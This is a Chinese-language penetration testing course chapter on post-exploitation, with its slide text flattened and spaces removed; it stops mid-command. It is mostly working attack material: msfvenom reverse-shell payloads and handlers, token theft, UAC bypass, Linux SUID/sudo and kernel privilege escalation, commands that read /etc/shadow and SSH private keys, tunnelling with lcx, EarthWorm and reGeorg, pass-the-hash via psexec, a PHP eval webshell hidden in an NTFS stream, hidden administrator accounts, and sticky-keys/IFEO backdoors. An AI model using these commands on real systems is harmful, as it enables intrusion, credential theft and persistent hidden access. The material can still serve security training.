第6章-6.3-后滲透測試實踐

后滲透測試實踐在拿到了一系列系統(tǒng)的訪問權(quán)限或者webshell后，接下來就進入一個很重要的階段，即后滲透測試階段。在匯報滲透測試結(jié)果時，客戶更想得到的成果是本次滲透能夠影響目標公司業(yè)務(wù)運行的戰(zhàn)利品，而不僅僅是一系列系統(tǒng)的訪問權(quán)限，所以需要通過后滲透測試階段擴大戰(zhàn)果。前言權(quán)限提升信息收集橫向滲透后門持久化痕跡清理Windows令牌竊取假設(shè)我們通過釣魚手段，獲取了一個meterpreter(管理員權(quán)限運行)#msf生成后門msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=31LPORT=4444-fexe>abc.exe#開啟msf監(jiān)聽useexploit/multi/handler

setpayloadwindows/x64/meterpreter/reverse_tcpsetlhost31setlport4444run

Windows令牌竊取#在meterpreter里加載loadincognitolist_tokens-u#列出tokenWindows令牌竊取#使用令牌impersonate_token"NTAUTHORITY\SYSTEM"Windows配置錯誤提權(quán)檢測目標主機是否存在該漏洞PS:wmicserviceget'name,displayname,pathname,startmode'|findstr/i"Auto"|findstr/i/v"C:\Windows"|findstr/i/v'[\"]‘cmd:wmicservicegetname,displayname,pathname,startmode|findstr/i"Auto"|findstr/i/v"C:\Windows"|findstr/i/v"""Windows配置錯誤提權(quán)存在不帶引號的服務(wù)路徑2.檢測路徑是否具有可寫入權(quán)限icacls"C:\phpstudypro"上傳文件至C:\phpstudypro\并重命名為phpstudy.exe，等待服務(wù)重啟或者手動重啟服務(wù)scstopphpStudySrvscstartphpStudySrv可以看到權(quán)限是systemWindows配置錯誤提權(quán)Windows不安全的注冊表權(quán)限配置使用powershell.exe查看是否有可以控制的注冊表項Get-Acl-Pathhklm:\System\CurrentControlSet\services\*|selectPath,AccessToString|Format-List>1.txtWindows不安全的注冊表權(quán)限配置修改注冊表regadd"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\phpStudySrv"/tREG_EXPAND_SZ/vImagePath/d"C:\beacon_wu.exe"/fWindows不安全的注冊表權(quán)限配置使用cmd重啟服務(wù)scstopphpStudySrvscstartphpStudySrv上線成功Windowsbypassuac1.bypassUAC項目:/hfiref0x/UACME項目里包含了很多不同種類的方法，其中DllHijack、Registrykeymanipulation、ElevatedCOMinterface這三種方法是項目中出現(xiàn)的較多且好用的，對應(yīng)23、33、41這三個方法號Akagi64.exe41Windowsbypassuac2.Msfbypassuac模塊exploit/windows/local/ask，此模塊也可以用來繞過UAC，會在目標電腦彈框，等待管理員輸入密碼后上線Windowsbypassuac3.cs模塊LinuxSuid提權(quán)錯誤配置sudochmodu+s/usr/bin/find使得find具有root權(quán)限以下命令可以發(fā)現(xiàn)系統(tǒng)上運行的所有SUID可執(zhí)行文件#不同系統(tǒng)適用于不同的命令，一個一個試find/-perm/4000–lsfind/-perm-u=s-typef2>/dev/nullfind/-userroot-perm-4000-print2>/dev/nullfind/-userroot-perm-4000-execls-ldb{}\;LinuxSUDO提權(quán)sudo-l查看sudo權(quán)限可以看到這兩個命令，在當前用戶下可以用sudo執(zhí)行，且不需要密碼提權(quán)命令sudofind/home-exec/bin/bash\;sudoziphash.ziphash.txt-T--unzip-command="sh-c/bin/bash"Linux內(nèi)核提權(quán)內(nèi)核提權(quán)基本步驟1、收集信息：確認目標主機Linux發(fā)行版本號、內(nèi)核版本號2、查找漏洞：根據(jù)發(fā)行版本號和內(nèi)核版本號搜索可利用的內(nèi)核漏洞3、執(zhí)行攻擊：下載漏洞利用EXP、編譯EXP、執(zhí)行EXPLinux內(nèi)核提權(quán)尋找EXP方式1：查看系統(tǒng)發(fā)?版本cat/etc/issuecat/etc/*-release查看內(nèi)核版本信息uname–a搜索該版本漏洞searchsploitubuntu3.13.0（searchsploit-u#更新數(shù)據(jù)庫）Exp存儲目錄/usr/share/exploitdb/exploits/Linux內(nèi)核提權(quán)尋找EXP方式2：信息搜集中的漏洞探針linux-exploit-suggesterlinux-exploit-suggester-2Linux內(nèi)核提權(quán)尋找EXP方式3：/搜索EXPLinux內(nèi)核提權(quán)1.臟牛提權(quán)LinuxKernel>=2.6.22的所有l(wèi)inux主機（沒打過補丁的）該范圍內(nèi)的核心發(fā)布為2007-2016年10月18日，所以該時段發(fā)布的版本是在影響范圍內(nèi)的2.overlayfs提權(quán)OverlayFS是一個面向Linux的文件系統(tǒng)服務(wù)，是一種類似aufs的一種堆疊文件系統(tǒng)，它依賴并建立在其它的文件系統(tǒng)上（如ext4fs和xfs等），并不直接參與磁盤空間結(jié)構(gòu)的劃分。CVE-2021-3493漏洞是Linux內(nèi)核中overlayfs文件系統(tǒng)中的Ubuntu特定問題，在Ubuntu中沒有正確驗證關(guān)于用戶名稱空間的文件系統(tǒng)功能的應(yīng)用程序。由于Ubuntu帶有一個支持非特權(quán)的overlayfs掛載的補丁，因此本地攻擊者可以使用它來進行提權(quán)操作3.CVE-2021-4034提權(quán)CVE-2021-4034是一個SUID提權(quán)漏洞，利用具有SUID-root權(quán)限的pkexec，精心構(gòu)造參數(shù)及運行環(huán)境，使其加載我們準備好提權(quán)的so。權(quán)限提升信息收集橫向滲透后門持久化痕跡清理信息收集后滲透測試階段的信息收集主要包括以下內(nèi)容：系統(tǒng)管理員密碼。其他用戶Session、3389和ipc連接記錄，各用戶回收站信息收集。瀏覽器密碼和瀏覽器Cookies的獲取（IE\Chrome\Firefox等）。Windows操作系統(tǒng)上連接無線網(wǎng)絡(luò)的密碼獲取、數(shù)據(jù)庫密碼獲取。host文件獲取和dns緩存信息收集等。殺軟、補丁、進程、網(wǎng)絡(luò)代理wpad信息，軟件列表信息。計劃任務(wù)、賬號密碼策略與鎖定策略、共享文件夾、Web服務(wù)器配置文件。VPN歷史密碼、teamview密碼、啟動項和iislog等。。。。Windows權(quán)限管理1.訪問控制Windows可以通過相互關(guān)聯(lián)的身份驗證和授權(quán)機制來控制系統(tǒng)和網(wǎng)絡(luò)資源的使用。在用戶通過身份驗證后，Windows操作系統(tǒng)使用內(nèi)置的授權(quán)和訪問控制技術(shù)來實現(xiàn)資源的保護，在確定用戶身份后，確認用戶是否具有訪問資源的正確權(quán)限。授權(quán)用戶、組和計算機訪問網(wǎng)絡(luò)或計算機上的對象的過程。構(gòu)成訪問控制的關(guān)鍵概念是權(quán)限、對象所有權(quán)、權(quán)限繼承、用戶權(quán)限和對象審計。Windows權(quán)限管理2.特權(quán)特權(quán)是一個帳戶(如用戶或組帳戶)在本地計算機上執(zhí)行各種系統(tǒng)相關(guān)操作(如關(guān)閉系統(tǒng)、加載設(shè)備驅(qū)動程序或更改系統(tǒng)時間)的權(quán)限。系統(tǒng)管理員為用戶和組帳戶分配特權(quán)，系統(tǒng)根據(jù)安全對象的DACL中的ACE授予的訪問權(quán)限授予或拒絕對安全對象的訪問。/cdaniu/p/15630284.html

每個系統(tǒng)都有一個帳戶數(shù)據(jù)庫，該數(shù)據(jù)庫存儲用戶和組帳戶擁有的特權(quán)。當用戶登錄時，系統(tǒng)生成一個訪問令牌，其中包含用戶權(quán)限的列表，包括授予用戶或用戶所屬組的權(quán)限。注意，這些特權(quán)只適用于本地計算機;域帳戶可以在不同的計算機上擁有不同的特權(quán)。

當用戶嘗試執(zhí)行特權(quán)操作時，系統(tǒng)檢查用戶的訪問令牌，以確定用戶是否擁有必要的特權(quán)，如果擁有，則檢查是否啟用了特權(quán)。如果測試失敗，系統(tǒng)將不再執(zhí)行該操作。Windows權(quán)限管理用戶與用戶組Windows權(quán)限管理3.UAC

用戶帳戶控制(UAC)有助于防止惡意軟件損壞PC，并幫助組織部署更好管理的桌面。使用UAC，應(yīng)用程序和任務(wù)始終在非管理員帳戶的安全上下文中運行，除非管理員專門授權(quán)管理員級別的系統(tǒng)訪問權(quán)限。UAC可以阻止未經(jīng)授權(quán)的應(yīng)用程序的自動安裝并防止無意中更改系統(tǒng)設(shè)置。

判斷方式（注冊表查詢）REGQUERYHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\/vConsentPromptBehaviorAdminREGQUERYHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\/vPromptOnSecureDesktop都為0是關(guān)閉狀態(tài)Windows權(quán)限管理4.令牌

令牌(AccessTokens)是Windows操作系統(tǒng)安全性的一個概念。

當用戶登陸時，系統(tǒng)創(chuàng)建一個訪問令牌，里面包含登錄進程返回的SID和由本地安全策略分配給用戶和用戶的安全組的特權(quán)列表。

系統(tǒng)使用令牌控制用戶可以訪問哪些安全對象，并控制用戶執(zhí)行相關(guān)系統(tǒng)操作的能力。Windows有兩種令牌：Delegationtoken(授權(quán)令牌):用于交互會話登錄(例如本地用戶直接登錄、遠程桌面登錄)Impersonationtoken(模擬令牌):用于非交互登錄(利用netuse訪問共享文件夾)注意：兩種token只在系統(tǒng)重啟后清除。具有Delegationtoken的用戶在注銷后，該Token將變成Impersonationtoken，依舊有效信息收集常用命令linux內(nèi)核、操作系統(tǒng)版本什么是發(fā)行類型？什么版本的？cat/etc/issuecat/etc/*-releasecat/etc/lsb-release#Debianbasedcat/etc/redhat-release#Redhatbased什么是內(nèi)核版本？是64位嗎？cat/proc/versionuname-auname-mrsrpm-qkerneldmesg|grepLinuxls/boot|grepvmlinuz-linux環(huán)境變量信息從環(huán)境變量中可以收集到什么信息？環(huán)境變量中可能存在密碼或API密鑰：cat/etc/profilecat/etc/bashrccat~/.bash_profilecat~/.bashrccat~/.bash_logoutenvset如果對該變量內(nèi)的任何文件夾都具有寫權(quán)限，則可以劫持某些庫或二進制echo$PATHlinux服務(wù)進程哪些服務(wù)正在運行？哪個服務(wù)具有哪個用戶特權(quán)？psauxps-eftopcat/etc/servicesroot正在運行哪些服務(wù)？在這些易受攻擊的服務(wù)中psaux|greprootps-ef|greproot安裝了哪些應(yīng)用程序？他們是什么版本的？他們目前在運行嗎？ls-alh/usr/bin/ls-alh/sbin/dpkg-lrpm-qals-alh/var/cache/apt/archivesOls-alh/var/cache/yum/服務(wù)設(shè)置是否配置錯誤？是否附有（脆弱的）插件？cat/etc/syslog.confcat/etc/chttp.confcat/etc/lighttpd.confcat/etc/cups/cupsd.confcat/etc/inetd.confcat/etc/apache2/apache2.confcat/etc/my.confcat/etc/httpd/conf/httpd.confcat/opt/lampp/etc/httpd.confls-aRl/etc/|awk‘$1~/^.*r.*/’linux計劃任務(wù)計劃了哪些工作？（計劃任務(wù)）crontab-lls-alh/var/spool/cronls-al/etc/|grepcronls-al/etc/cron*cat/etc/cron*cat/etc/at.allowcat/etc/at.denycat/etc/cron.allowcat/etc/cron.denycat/etc/crontabcat/etc/anacrontabcat/var/spool/cron/crontabs/root服務(wù)設(shè)置是否配置錯誤？是否附有（脆弱的）插件？cat/etc/syslog.confcat/etc/chttp.confcat/etc/lighttpd.confcat/etc/cups/cupsd.confcat/etc/inetd.confcat/etc/apache2/apache2.confcat/etc/my.confcat/etc/httpd/conf/httpd.confcat/opt/lampp/etc/httpd.confls-aRl/etc/|awk‘$1~/^.*r.*/’linux敏感文件是否有純文本用戶名和/或密碼？檢查Web服務(wù)器連接到數(shù)據(jù)庫的文件（config.php或類似文件）檢查數(shù)據(jù)庫以獲取可能被重用的管理員密碼檢查弱密碼grep-iuser[filename]grep-ipass[filename]grep-C5"password"[filename]find.-name"*.php"-print0|xargs-0grep-i-n"var$password"#Joomlacat/etc/passwdcat/etc/groupcat/etc/shadowls-alh/var/mail/idwhocat/etc/passwd|cut-d:-f1#Listofusersgrep-v-E"^#"/etc/passwd|awk-Fa:'$3==0{print$1}'cat/etc/sudoerssudo-l查看秘鑰文件cat~/.ssh/authorized_keyscat~/.ssh/identity.pubcat~/.ssh/identitycat~/.ssh/id_rsa.pubcat~/.ssh/id_rsacat~/.ssh/id_dsa.pubcat~/.ssh/id_dsacat/etc/ssh/ssh_configcat/etc/ssh/sshd_configcat/etc/ssh/ssh_host_dsa_key.pubcat/etc/ssh/ssh_host_dsa_keycat/etc/ssh/ssh_host_rsa_key.pubcat/etc/ssh/ssh_host_rsa_keycat/etc/ssh/ssh_host_key.pubcat/etc/ssh/ssh_host_keylinux敏感文件linux網(wǎng)絡(luò)信息系統(tǒng)具有哪些NIC？它是否連接到另一個網(wǎng)絡(luò)？/sbin/ifconfig-acat/etc/network/interfacescat/etc/sysconfig/network什么是網(wǎng)絡(luò)配置設(shè)置？我們可以找到關(guān)于該網(wǎng)絡(luò)的哪些信息？DHCP服務(wù)器？DNS服務(wù)器？網(wǎng)關(guān)？cat/etc/resolv.confcat/etc/sysconfig/networkcat/etc/networksiptables-LhostnameDnsdomainname緩存arp-eroute/sbin/route–nee抓包tcpdumptcpdst80andtcpdst5221msf中主要的獲取信息模塊：post/windows/gather/forensics/enum_drives分區(qū)信息post/windows/gather/checkvm判斷是否為虛擬機post/windows/gather/enum_services開啟了那些服務(wù)post/windows/gather/enum_applications已安裝的應(yīng)用post/windows/gather/enum_shares共享信息post/windows/gather/dumplinks最近的操作記錄post/windows/gather/enum_patches系統(tǒng)補丁信息scraper腳本winenum腳本權(quán)限提升信息收集橫向滲透后門持久化痕跡清理橫向滲透在漏洞攻擊階段，獲得一臺服務(wù)器的訪問權(quán)限以后，如果想要獲取更大的權(quán)限，了解整個網(wǎng)絡(luò)布局，就需要進行橫向滲透（即內(nèi)網(wǎng)滲透）。內(nèi)網(wǎng)穿透原理是利用各種隧道技術(shù)，以網(wǎng)絡(luò)防火墻策略允許的協(xié)議，繞過網(wǎng)絡(luò)防火墻的封鎖，實現(xiàn)訪問被封鎖的目標網(wǎng)絡(luò)。什么是代理代理也被叫做網(wǎng)絡(luò)代理，是一種比較特殊的網(wǎng)絡(luò)服務(wù)，允許一個終端（通常指客戶端）通過這個服務(wù)與另一個終端（通常指服務(wù)器端）進行非直接的連接。例如：一些網(wǎng)關(guān)、路由器等網(wǎng)絡(luò)設(shè)備都具備網(wǎng)絡(luò)代理的功能。代理服務(wù)有利于保障網(wǎng)絡(luò)終端的隱私或者安全，可以在一定程度上阻止網(wǎng)絡(luò)攻擊（因為通過代理，可以隱藏真正的服務(wù)器端/客戶端）。代理服務(wù)器：一個數(shù)據(jù)通信中轉(zhuǎn)的功能代理請求過程客戶端首先根據(jù)代理服務(wù)器所使用的代理協(xié)議，與代理服務(wù)器創(chuàng)建連接，接著按照協(xié)議請求對目標服務(wù)器創(chuàng)建連接、或者獲得目標服務(wù)器的指定資源（如：文件）。代理協(xié)議SockHTTP正向代理正向代理時，由客戶端發(fā)送對某一個目標服務(wù)器的請求，但是該請求的數(shù)據(jù)包會先發(fā)往代理服務(wù)器，代理服務(wù)器在中間將請求轉(zhuǎn)發(fā)給該目標服務(wù)器，目標服務(wù)器將結(jié)果返回給代理服務(wù)器，代理服務(wù)器再將結(jié)果返回給客戶端。使用正向代理時，客戶端是需要配置代理服務(wù)的地址、端口、賬號密碼（如有）等才可使用的。正向代理的適用場景訪問被禁止的資源（讓客戶端訪問原本不能訪問的服務(wù)器?？赡苁怯捎诼酚傻脑颍蛘卟呗耘渲玫脑?，客戶端不能直接訪問某些服務(wù)器。為了訪問這些服務(wù)器，可通過代理服務(wù)器來訪問）隱藏客戶端的地址（對于被請求的服務(wù)器而言，代理服務(wù)器代表了客戶端，所以在服務(wù)器或者網(wǎng)絡(luò)拓撲上，看不到原始客戶端）這也是我們掛代理可以減少被發(fā)現(xiàn)真實IP的原因進行客戶訪問控制加速訪問資源過濾內(nèi)容（可以通過代理服務(wù)器統(tǒng)一過濾一些危險的指令/統(tǒng)一加密一些內(nèi)容、防御代理服務(wù)器兩端的一些攻擊性行為）反向代理服務(wù)器根據(jù)客戶端的請求，從其關(guān)系的一組或多組后端服務(wù)器（如Web服務(wù)器）上獲取資源，然后再將這些資源返回給客戶端，客戶端只會得知代理服務(wù)器的IP地址，而不知道在代理服務(wù)器后面的服務(wù)器集群的存在。反向代理整個流程：由客戶端發(fā)起對代理服務(wù)器的請求，代理服務(wù)器在中間將請求轉(zhuǎn)發(fā)給某一個服務(wù)器，服務(wù)器將結(jié)果返回給代理服務(wù)器，代理服務(wù)器再將結(jié)果返回給客戶端。反向代理的適用場景負載均衡提升服務(wù)器安全性加密/SSL加速：將SSL加密工作交由配備了SSL硬件加速器的反向代理來完成提供緩存服務(wù)，加速客戶端訪問數(shù)據(jù)統(tǒng)一壓縮節(jié)約帶寬為網(wǎng)絡(luò)帶寬不好的網(wǎng)絡(luò)提供服務(wù)統(tǒng)一的訪問權(quán)限控制統(tǒng)一的訪問控制突破互聯(lián)網(wǎng)的封鎖為在私有網(wǎng)絡(luò)下（如局域網(wǎng)）的服務(wù)器集群提供NAT穿透及外網(wǎng)發(fā)布服務(wù)上傳下載減速控制…正向代理與反向代理的區(qū)別最核心的不同在于代理的對象不同。正向代理是代理客戶端，反向代理是代理服務(wù)器。而根據(jù)這核心的區(qū)別，我們也可以記住：代理哪端便可以隱藏哪端。也就是說：正向代理隱藏真實客戶端，反向代理隱藏真實服務(wù)端。端口轉(zhuǎn)發(fā)端口轉(zhuǎn)發(fā)也稱之為隧道，對流量進行加密后在進行傳遞。端口轉(zhuǎn)發(fā)就是將一個端口上的流量，發(fā)送到本機可以訪問到的任意主機的端口上，這個端口可以本機的端口也可以是本機可以訪問到的任意主機的端口都可以轉(zhuǎn)發(fā)到任意一臺可以訪問到的IP上，通常這個IP是公網(wǎng)IP，方便我們使用。端口映射顧名思義，就是映射端口，就是將一個內(nèi)網(wǎng)端口映射到公網(wǎng)上的某個端口端口映射與轉(zhuǎn)發(fā)的區(qū)別端口映射與轉(zhuǎn)發(fā)的區(qū)別：映射只需要提供映射服務(wù)的機器的權(quán)限，同時能夠訪問到需要映射的目標服務(wù)即可，轉(zhuǎn)發(fā)的話就需要提供兩臺服務(wù)器的權(quán)限，建立點對點的服務(wù)連接端口轉(zhuǎn)發(fā)之LCX//與的4444端口建立通信，并把流量轉(zhuǎn)發(fā)到本地的3389端口lcx.exe-slave44443389//監(jiān)聽本地5555端口的流量，將其轉(zhuǎn)發(fā)到4444端口lcx.exe-listen44445555//主機A的4444端口監(jiān)聽主機B的請求，并將來自4444端口的請求轉(zhuǎn)發(fā)到5555端口端口轉(zhuǎn)發(fā)之portmap先在具有公網(wǎng)ip的主機上執(zhí)行：//監(jiān)聽7777端口，將7777端口發(fā)送至6666端口，6666端口等待目標綁定服務(wù)./portmap-m2-p16666-h2公網(wǎng)主機ip-p27777將22端口綁定到公網(wǎng)機器的6666端口上./portmap-m3-h1-p122-h2公網(wǎng)主機ip-p26666端口映射（本地端口轉(zhuǎn)發(fā)）之LCX.EXElcx-tran53目標主機ip3389常用隧道分類VPN（pptp,openvpn,ciscoipsecvpn等等）SSHICMP(icmptunnel)DNS(Chashell)HTTP(reGeorg,ABPTTS,Tunna)Socks5(nps,frp,s5.py)P2P(dog-tunnel)SSH通道通過一臺中間SSH服務(wù)器去訪問內(nèi)網(wǎng)，可以繞過防火墻的限制。（就是將SSH服務(wù)器作為跳板，去訪問內(nèi)部網(wǎng)絡(luò)）命令如下：ssh-g-LLPORT:RHOST:RPORT-fNLHOST#-L參數(shù)表示做本地的端口映射：RHOST和RPORT是目標主機和端口，LPORT是SSH服務(wù)器的端口#-f參數(shù)表示SSH客戶端在后臺運行#-N參數(shù)表示該連接不做任何操作，僅用于端口轉(zhuǎn)發(fā)#-g參數(shù)表示允許外來主機連接本地轉(zhuǎn)發(fā)端口（不指定的話只允許本地連接）SSH端口轉(zhuǎn)發(fā)本地訪問:port1就是host:port2(用的更多)ssh-CfNg-Lport1::port2user@host#本地轉(zhuǎn)發(fā)訪問host:port2就是訪問:port1ssh-CfNg-Rport2::port1user@host#遠程轉(zhuǎn)發(fā)可以將dmz_host的hostport端口通過remote_ip轉(zhuǎn)發(fā)到本地的port端口ssh-qTfnN-Lport:dmz_host:hostport-luserremote_ip#正向隧道，監(jiān)聽本地port可以將dmz_host的hostport端口轉(zhuǎn)發(fā)到remote_ip的port端口ssh-qTfnN-Rport:dmz_host:hostport-luserremote_ip#反向隧道，用于內(nèi)網(wǎng)穿透防火墻限制之類SSHsocks代理socket代理:ssh-qTfnN-Dportremotehost在本地起一個端口與遠程主機建立連接，通過這個端口的流量就相當于遠程主機發(fā)出的基于http的轉(zhuǎn)發(fā)與socket代理如果目標是在dmz里面，數(shù)據(jù)除了web其他出不來，便可以利用http進行1、端口轉(zhuǎn)發(fā)tuna端口轉(zhuǎn)發(fā)(將遠程3389轉(zhuǎn)發(fā)到本地1234)pythonproxy.py-u/conn.jsp-l1234-r3389-v連接不能中斷服務(wù)(比如ssh)pythonproxy.py-u/conn.jsp-l1234-r22-v-s轉(zhuǎn)發(fā)的3389到本地pythonproxy.py-u/conn.jsp-l1234-a-r3389基于http的轉(zhuǎn)發(fā)與socket代理2.socks代理reGeorg攻擊機執(zhí)行腳本，將內(nèi)網(wǎng)機器流量代理到本地端口pythonreGeorgSocksProxy.py-u01/tunnel.php-p8081EarthWorm工具內(nèi)網(wǎng)穿透神器：/idlefire/ew跨平臺+端口轉(zhuǎn)發(fā)+socket代理結(jié)合體！#rcsocks客戶端，監(jiān)聽端口以及轉(zhuǎn)發(fā)端口#rsscoks服務(wù)端，指定連接的主機以及端口EarthWorm工具將OWSAP服務(wù)器作為代理服務(wù)器，VPS作為客戶端，去訪問內(nèi)網(wǎng)Ubuntu服務(wù)器在VPS客戶端執(zhí)行以下命令：#本地監(jiān)聽1080端口，轉(zhuǎn)發(fā)端口設(shè)置為10000./ew_for_linux64-srcsocks-l1080-e10000#vim/etc/proxychains.conf 全局代理配置#添加監(jiān)聽的主機以及端口（添加自己主機IP和端口）socks5281080EarthWorm工具在OWASP開啟服務(wù)端執(zhí)行以下命令：#連接客戶端主機的10000端口./ew_for_Linux32-srssocks-d28-e10000在瀏覽器配置好socks5代理，即可訪問內(nèi)網(wǎng)服務(wù)器MSF開啟代理隧道實例MSF生成反向payload#生成payloadmsfvenom-pwindows/meterpreter/reverse_tcpLHOST=28LPORT=4443-felf>msf.elf#設(shè)置監(jiān)聽useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhostsetlport60020run在目標上運行msf.exe文件上線MSF開啟代理隧道實例MSF添加路由內(nèi)網(wǎng)中添加路由主要是充當跳板功能，其實是MSF框架中自帶的一個路由轉(zhuǎn)發(fā)功能，其實現(xiàn)過程就是MSF框架在已經(jīng)獲取的meterpretershell的基礎(chǔ)上添加一條去往內(nèi)網(wǎng)的路由，此路由的下一跳轉(zhuǎn)發(fā)，即網(wǎng)關(guān)，是MSF攻擊平臺與被攻擊目標建立的一個session會話通過msf添加路由功能，可以直接使用msf去訪問原本不能直接訪問的內(nèi)網(wǎng)資源，只要路由可達了，那么我們使用msf的強大功能，想干什么就干什么了跳板實現(xiàn)過程（1）需要有一個已經(jīng)獲取的meterpreter會話；（2）獲取內(nèi)網(wǎng)地址網(wǎng)段（3）在MSF平臺上添加去往內(nèi)網(wǎng)網(wǎng)段的路由MSF開啟代理隧道實例在獲取一個session會話后1、獲取目標內(nèi)網(wǎng)相關(guān)信息MSF開啟代理隧道實例添加一個通往/24段的路由runautoroute-s/24運行runautoroute-p查看路由MSF開啟代理隧道實例msf中設(shè)置代理，background退出meterpreter的shell環(huán)境，搜索socks，使用代理模塊。useauxiliary/server/socks_proxysetsrvhost39setsrvport1080setversion4aexploitMSF開啟代理隧道實例然后配置proxychains的配置文件/etc/proxychains4.conf。MSF開啟代理隧道實例然后使用proxychains代理nmap進行主機及端口掃描，命令：proxychainsnmap-Pn-sT-p80-T4/24。//-sT全開掃描，完成三次握手//-Pn不使用ping掃描注意proxychains只對tcp流量有效，udp和icmp都是不能代理轉(zhuǎn)發(fā)的橫向滲透>regADDHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System/vEnableLUA/tREG_DWORD/d0/f>regADDHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system/vLocalAccountTokenFilterPolicy/tREG_DWORD/d1/f>shutdown-r-t0哈希傳遞：windows系統(tǒng)下的hash密碼格式用戶名稱:RID:LM-HASH值:NT-HASH值獲取Hash值hashdump(需要關(guān)閉UAC)post/windows/gather/hashdump關(guān)閉UAC橫向滲透msf>useexploit/windows/smb/psexecmsfexploit(windows/smb/psexec)>setRHOST32msfexploit(windows/smb/psexec)>setSMBUserJohnmsfexploit(windows/smb/psexec)>setSMBPassaad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0msfexploit(windows/smb/psexec)>setpayloadwindows/meterpreter/reverse_tcpmsfexploit(windows/smb/psexec)>setLHOST28msfexploit(windows/smb/psexec)>exploit哈希傳遞：psexec模塊：exploit/windows/smb/psexec(需要關(guān)閉UAC)權(quán)限提升信息收集橫向滲透后門持久化痕跡清理Windows后門持久化隱藏文件夾及文件1.文件屬性2.ADS流3.工具隱藏Windows隱藏文件夾及文件1.文件屬性勾選隱藏后，文件會隱藏起來。如果勾選查看選項卡下的隱藏項目，這種方式隱藏的文件將會被顯示出來Windows隱藏文件夾及文件2.ADS流NTFS交換數(shù)據(jù)流（AlternateDataStreams，簡稱ADS）是NTFS磁盤格式的一個特性。在NTFS文件系統(tǒng)下，每個文件都可以存在多個數(shù)據(jù)流，意思是除了主文件流之外還可以有許多非主文件流寄宿在主文件流中，這些利用NTFS數(shù)據(jù)流寄宿并隱藏在系統(tǒng)中的非主文件流我們稱之為ADS流文件。雖然我們無法看到ADS流文件，但它們卻是真實存在。echo^<?phpecho1111;@eval(echo111111;$_POST['chopper']);?^>>1.php:hidden.jpgWindows隱藏文件夾及文件2.ADS流如果需要訪問到該webshell則需要利用文件包含來訪問該隱藏文件Windows隱藏文件夾及文件3.工具隱藏EasyFileLocker/efl.htmlWindows系統(tǒng)隱藏賬戶Netuserhacker$123456/add#添加hacker$隱藏用戶Netlocalgroupadministratorshacker$/add#將hacker$用戶添加進管理員組中此時雖然使用命令行無法看到hacker$用戶，但是通過控制面板依然還是可以看到hacker$賬戶存在的。為了更好的隱藏新建的賬戶，還需要進行如下操作。Windows系統(tǒng)隱藏賬戶首先打開注冊表編輯器，找到HKEY_LOCAL_MACHINE\SAM\SAM，點擊右鍵，選擇“權(quán)限”，將Administrator用戶的權(quán)限，設(shè)置成“完全控制”，然后重新打開注冊表，確?？梢钥吹絊AM路徑下的文件。Windows系統(tǒng)隱藏賬戶其次前往SAM/Domains/Account/Users/Names處，選擇Administrator用戶，在右側(cè)的鍵值處可以找到對應(yīng)的值如0x1f4，然后從左側(cè)的Users目錄下可以找到對應(yīng)的文件。Windows系統(tǒng)隱藏賬戶然后從對應(yīng)的000001F4文件中將鍵值對F的值復制出來。然后同理找到隱藏賬戶hacker$所對應(yīng)的文件，并將從Administrator文件中復制出來的F值粘貼進hacker$文件中。Windows系統(tǒng)隱藏賬戶最后將hacker$和000003EE從注冊表中右鍵導出，并刪除hacker$用戶，然后將剛剛導出的兩個文件重新導入進注冊表中即可實現(xiàn)hacker用戶的隱藏。Windows映像劫持在低版本的系統(tǒng)中我們可以替換一些輔助功能文件來達到權(quán)限維持的目的，例如在XP系統(tǒng)中，直接替換粘滯鍵Sethc.exe（最常見的按5下shift）以及Windows+U組合鍵時啟動的utilman.exe程序屏幕鍵盤：C:\Windows\System32\osk.exe放大鏡：C:\Windows\System32\Magnify.exe旁白：C:\Windows\System32\Narrator.exe顯示切換器C:\Windows\System32\DisplaySwitch.exe應(yīng)用切換器：C:\Windows\System32\AtBroker.exeWindows映像劫持XP及2003下的粘滯鍵后門實驗，直接替換目標文件即可cdWINDOWS\system32movesethc.exesethc.exe.bakcopycmd.exesethc.exeWindows映像劫持高版本的windows需要IFEO,即映像劫持。所謂的IFEO就是ImageFileExecutionOptions，直譯過來就是映像劫持。它又被稱為“重定向劫持”（RedirectionHijack），它和“映像劫持”（ImageHijack，或IFEOHijack）只是稱呼不同，實際上都是一樣的技術(shù)手段。白話來講就是做某個操作的時候被攔截下來，干了別的事。當我們雙擊運行程序時，系統(tǒng)會查詢該IFEO注冊表，如果發(fā)現(xiàn)存在和該程序名稱完全相同的子鍵，就查詢對應(yīng)子健中包含的“debugger”鍵值名，如果該參數(shù)不為空，系統(tǒng)則會把Debugger參數(shù)里指定的程序文件名作為用戶試圖啟動的程序執(zhí)行請求來處理。這樣成功執(zhí)行的是遭到“劫持”的虛假程序。Windows映像劫持打開注冊表regedit,一直到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Windows映像劫持以mmc.exe為例，添加鍵值對:debuggerc:\windows\system32\cmd.exe命令行修改regadd"HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\iexplore.exe"/v"Debugger"/tREG_SZ/d"c:\windows\system32\cmd.exe"/fregadd"HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Utilman.exe"/v"Debugger"/tREG_SZ/d"c:\windows\system32\cmd.exe"/f實際在運用的時候，可以把這個運行的程序替換為后門程序例如一些遠控程序Windows映像劫持在注冊表中新增Utilman.exe表項，添加鍵值對Debugger=“C:\WINDOWS\System32\cmd.exe”在登陸頁面上運行win+u，在無需登錄的情況下就打開了cmd命令框。Windows開始菜單啟動項開始菜單啟動項，指示啟動文件夾的位置，具體的位置是“開始”菜單中的“所有程序”-“啟動”選項：[WIN+R輸入]shell:startupC:\Users\用戶名稱\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup在該菜單下放置可執(zhí)行文件，等待重啟就會自動運行Windows計劃任務(wù)后門通過window系統(tǒng)的任務(wù)計劃程序功能實現(xiàn)定時啟動某個任務(wù)，執(zhí)行某個腳本。使用以下命令可以一鍵實現(xiàn)：schtasks/create/scminute/mo1/tn"Security